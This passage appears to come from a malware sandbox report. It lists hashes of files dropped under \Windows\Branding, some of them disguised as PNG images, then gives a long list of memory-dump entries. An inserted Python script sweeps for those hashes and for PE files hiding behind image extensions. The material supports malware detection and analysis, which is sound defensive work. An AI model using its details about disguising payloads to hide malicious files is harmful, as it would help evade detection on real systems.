  SHA512: a75d4552063755e39aeb1bd1b6b56f44d638c8197bf4a21149f72e9e87a40a899919915d7a3ebafc256f6f6e374ccef2431d4716b18882add9c98cb9c5be27a1
- \Windows\Branding\mediasrv.png
  MD5: eeb448ea2709c57b9ea2e223d0c79396
  SHA1: 38331dd027386151ee37a29a7820570a76427b02
  SHA256: c82a8ca8997348bc1631637799d8c88e33df3b64d23fdb006a1afdb5e0170272
  SHA512: c133096ce90e5693669c056a31870b982b162196508babae4d1d9eb4055f2096af9460164d68885693af56389a42977f4193906da1d19f457e26187a46a5e3fc
- \Windows\Branding\mediasvc.png
  MD5: bb873bd05a47f502ee4ed3c4ea749a4f
  SHA1: e55a6bf49a4833fb9e9b123df39dac9bf507f75a
  SHA256: a6a28143f81b007c6853cc80829c16d2aadbe427abe1408276b558f34904900a
  SHA512: ce2a22e5e78d3f01a6880a48153f6d3ba8ff025d7bbfe8949b7742a5b7ffa9e44484027353bb80b70e8cad8181dc26b6aabe637b5f7fd2aa4a99cd880d758548
-
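The dropped-file hashes above are most useful as a sweep list. The following Python is an added example, not part of the sandbox report: it walks a directory, flags any file whose SHA256 matches one of the three dropped files named in the list (rfxvmt.dll, mediasrv.png, mediasvc.png; values copied from the entries above), and, going beyond the hash list, also flags files that carry an image extension but begin with the MZ header of a PE image, since an exact hash will miss a re-packed copy of the same drop stored under the same kind of disguised name. The root directory, the NON_EXECUTABLE_EXTS set and the files that demo() constructs are assumptions of the example, not artifacts from the report.

```python
"""IOC sweep for the dropped files listed in this report (added example)."""
import hashlib
import os
import tempfile
from pathlib import Path
from typing import Dict, List

# SHA256 values copied from the report's dropped-file list above.
# Keys are the file names as they appear in the report.
REPORT_SHA256: Dict[str, str] = {
    "rfxvmt.dll":   "6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9",
    "mediasrv.png": "c82a8ca8997348bc1631637799d8c88e33df3b64d23fdb006a1afdb5e0170272",
    "mediasvc.png": "a6a28143f81b007c6853cc80829c16d2aadbe427abe1408276b558f34904900a",
}

# Assumed set of extensions that should never hold a PE image; the report's
# payloads are stored as .png files under \Windows\Branding.
NON_EXECUTABLE_EXTS = {".png", ".jpg", ".gif", ".bmp", ".txt", ".log"}


def sha256_of(path: Path, chunk: int = 1 << 20) -> str:
    """Stream the file so a large drop is never loaded whole into memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def looks_like_pe(path: Path) -> bool:
    """True if the file starts with the 'MZ' DOS header, whatever its extension."""
    with path.open("rb") as f:
        return f.read(2) == b"MZ"


def sweep(root: Path, ioc_sha256: Dict[str, str] = REPORT_SHA256) -> List[dict]:
    """Walk root; report exact hash hits and PE images hiding behind image extensions."""
    hits: List[dict] = []
    known = {v.lower(): k for k, v in ioc_sha256.items()}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            try:
                digest = sha256_of(p)
                pe = looks_like_pe(p)
            except OSError:
                continue  # unreadable or vanished between listing and open
            if digest in known:
                hits.append({"path": str(p), "reason": "sha256-match",
                             "ioc_name": known[digest]})
            elif pe and p.suffix.lower() in NON_EXECUTABLE_EXTS:
                hits.append({"path": str(p), "reason": "pe-with-image-extension",
                             "sha256": digest})
    return hits


def demo() -> List[dict]:
    """Sweep a throwaway tree of constructed files (sample input, not from the report)."""
    planted = b"constructed sample content standing in for a dropped payload"
    iocs = dict(REPORT_SHA256)
    iocs["planted.bin"] = hashlib.sha256(planted).hexdigest()  # constructed IOC
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "Branding").mkdir()
        # A PE image stored under a .png name, the pattern the report shows.
        (root / "Branding" / "fake.png").write_bytes(b"MZ" + b"\x90" * 62)
        # A genuine PNG signature: must not fire.
        (root / "Branding" / "real.png").write_bytes(b"\x89PNG\r\n\x1a\n")
        # An exact hash hit on the constructed content.
        (root / "planted.bin").write_bytes(planted)
        return sorted(sweep(root, iocs), key=lambda h: h["reason"])


if __name__ == "__main__":
    for hit in demo():
        print(hit)
```

On a live host the call is sweep(Path(r"C:\Windows")) with the default IOC set; the hash check keys on content rather than path, so a renamed copy is still caught, while the MZ check catches a re-packed copy that the hash list cannot.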
memory/272-40-0x0000000000000000-mapping.dmp
-
memory/340-46-0x0000000000000000-mapping.dmp
-
memory/528-54-0x0000000000000000-mapping.dmp
-
memory/572-68-0x0000000000000000-mapping.dmp
-
memory/572-53-0x0000000000000000-mapping.dmp
-
memory/640-81-0x0000000000000000-mapping.dmp
-
memory/704-61-0x0000000000000000-mapping.dmp
-
memory/792-86-0x0000000019450000-0x0000000019451000-memory.dmp
Filesize
4KB
-
memory/792-111-0x000000001ACA0000-0x000000001ACA1000-memory.dmp
Filesize
4KB
-
memory/792-93-0x00000000010E0000-0x00000000010E1000-memory.dmp
Filesize
4KB
-
memory/792-110-0x0000000019490000-0x0000000019491000-memory.dmp
Filesize
4KB
-
memory/792-76-0x000007FEF5060000-0x000007FEF5A4C000-memory.dmp
Filesize
9.9MB
-
memory/792-75-0x0000000000000000-mapping.dmp
-
memory/792-94-0x0000000000F90000-0x0000000000F91000-memory.dmp
Filesize
4KB
-
memory/792-102-0x0000000001210000-0x0000000001211000-memory.dmp
Filesize
4KB
-
memory/792-92-0x0000000000F80000-0x0000000000F81000-memory.dmp
Filesize
4KB
-
memory/792-91-0x0000000000B70000-0x0000000000B71000-memory.dmp
Filesize
4KB
-
memory/792-103-0x000000001A1B0000-0x000000001A1B1000-memory.dmp
Filesize
4KB
-
memory/792-95-0x0000000001100000-0x0000000001101000-memory.dmp
Filesize
4KB
-
memory/992-57-0x0000000000000000-mapping.dmp
-
memory/1048-71-0x0000000000000000-mapping.dmp
-
memory/1080-55-0x0000000000000000-mapping.dmp
-
memory/1088-49-0x0000000000000000-mapping.dmp
-
memory/1152-41-0x0000000000000000-mapping.dmp
-
memory/1184-72-0x0000000000000000-mapping.dmp
-
memory/1184-62-0x0000000000000000-mapping.dmp
-
memory/1188-73-0x0000000000000000-mapping.dmp
-
memory/1188-42-0x0000000000000000-mapping.dmp
-
memory/1204-38-0x0000000000000000-mapping.dmp
-
memory/1288-56-0x0000000000000000-mapping.dmp
-
memory/1300-70-0x0000000000000000-mapping.dmp
-
memory/1300-36-0x0000000000000000-mapping.dmp
-
memory/1520-48-0x0000000000000000-mapping.dmp
-
memory/1576-82-0x0000000000000000-mapping.dmp
-
memory/1580-39-0x0000000000000000-mapping.dmp
-
memory/1596-45-0x0000000000000000-mapping.dmp
-
memory/1636-52-0x0000000000000000-mapping.dmp
-
memory/1644-47-0x0000000000000000-mapping.dmp
-
memory/1660-10-0x0000000000000000-mapping.dmp
-
memory/1672-51-0x0000000000000000-mapping.dmp
-
memory/1676-66-0x0000000000000000-mapping.dmp
-
memory/1684-50-0x0000000000000000-mapping.dmp
-
memory/1700-2-0x0000000000000000-mapping.dmp
-
memory/1700-35-0x000000001C280000-0x000000001C281000-memory.dmp
Filesize
4KB
-
memory/1700-9-0x000000001B690000-0x000000001B691000-memory.dmp
Filesize
4KB
-
memory/1700-3-0x000007FEF5060000-0x000007FEF5A4C000-memory.dmp
Filesize
9.9MB
-
memory/1700-4-0x0000000002280000-0x0000000002281000-memory.dmp
Filesize
4KB
-
memory/1700-5-0x000000001AC20000-0x000000001AC21000-memory.dmp
Filesize
4KB
-
memory/1700-7-0x0000000002480000-0x0000000002481000-memory.dmp
Filesize
4KB
-
memory/1700-17-0x0000000001F20000-0x0000000001F21000-memory.dmp
Filesize
4KB
-
memory/1700-18-0x0000000002550000-0x0000000002551000-memory.dmp
Filesize
4KB
-
memory/1700-21-0x000000001B4D0000-0x000000001B4D1000-memory.dmp
Filesize
4KB
-
memory/1700-6-0x0000000002340000-0x0000000002341000-memory.dmp
Filesize
4KB
-
memory/1700-34-0x000000001A6B0000-0x000000001A6B1000-memory.dmp
Filesize
4KB
-
memory/1700-33-0x0000000002620000-0x0000000002621000-memory.dmp
Filesize
4KB
-
memory/1720-43-0x0000000000000000-mapping.dmp
-
memory/1736-64-0x0000000000000000-mapping.dmp
-
memory/1740-65-0x0000000000000000-mapping.dmp
-
memory/1740-44-0x0000000000000000-mapping.dmp
-
memory/1844-13-0x0000000000000000-mapping.dmp
-
memory/1844-69-0x0000000000000000-mapping.dmp
-
memory/1868-63-0x0000000000000000-mapping.dmp
-
memory/1916-60-0x0000000000000000-mapping.dmp
-
memory/1960-0-0x00000000010C0000-0x00000000013FD000-memory.dmp
Filesize
3.2MB
-
memory/1960-1-0x0000000001400000-0x0000000001411000-memory.dmp
Filesize
68KB
-
memory/2040-74-0x0000000000000000-mapping.dmp
-
memory/2040-67-0x0000000000000000-mapping.dmp